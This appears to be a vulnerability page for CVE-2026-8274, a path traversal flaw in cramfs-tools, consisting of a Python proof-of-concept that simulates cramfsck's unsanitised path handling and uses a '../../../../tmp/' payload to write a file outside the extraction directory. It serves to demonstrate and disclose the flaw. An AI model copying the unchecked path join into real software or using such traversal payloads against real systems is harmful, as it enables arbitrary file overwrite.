CVE-2026-8274 cramfs-tools路径遍历漏洞

import os # Simulating the vulnerable logic in cramfsck.c do_directory function # This script demonstrates how a lack of path sanitization leads to traversal. def vulnerable_do_directory(file_path, extract_to="."): # Vulnerability: No sanitization of path traversal characters (../) # The function directly joins paths without resolving or checking boundaries. full_path = os.path.join(extract_to, file_path) # Normalize path to see where it actually points (for demonstration) real_path = os.path.realpath(full_path) print(f"[DEBUG] Intended extraction dir: {os.path.realpath(extract_to)}") print(f"[DEBUG] Resolved file path: {real_path}") # Check if the path escaped the intended directory if not real_path.startswith(os.path.realpath(extract_to)): print("[ALERT] Path Traversal Detected! Writing outside the intended directory.") else: print("[INFO] Path is safe.") # Simulating file operation (e.g., reading or creating) try: # In the real vulnerability, this would write to the filesystem print(f"[ACTION] Attempting to write to: {full_path}") with open(full_path, 'w') as f: f.write("Exploited content") print(f"[SUCCESS] File written at {real_path}") except Exception as e: print(f"[ERROR] {e}") # PoC Execution if __name__ == "__main__": # Attacker crafts a malicious path inside the filesystem image # using '../' to escape the current directory malicious_payload = "../../../../tmp/pwned_by_cve_2026_8274.txt" print("--- CVE-2026-8274 PoC Simulation ---") print(f"Payload: {malicious_payload}") print("Running cramfsck (simulated) on malicious image...") # Assuming the tool runs in a directory like /home/user/extract/ # The vulnerable function processes the malicious path vulnerable_do_directory(malicious_payload)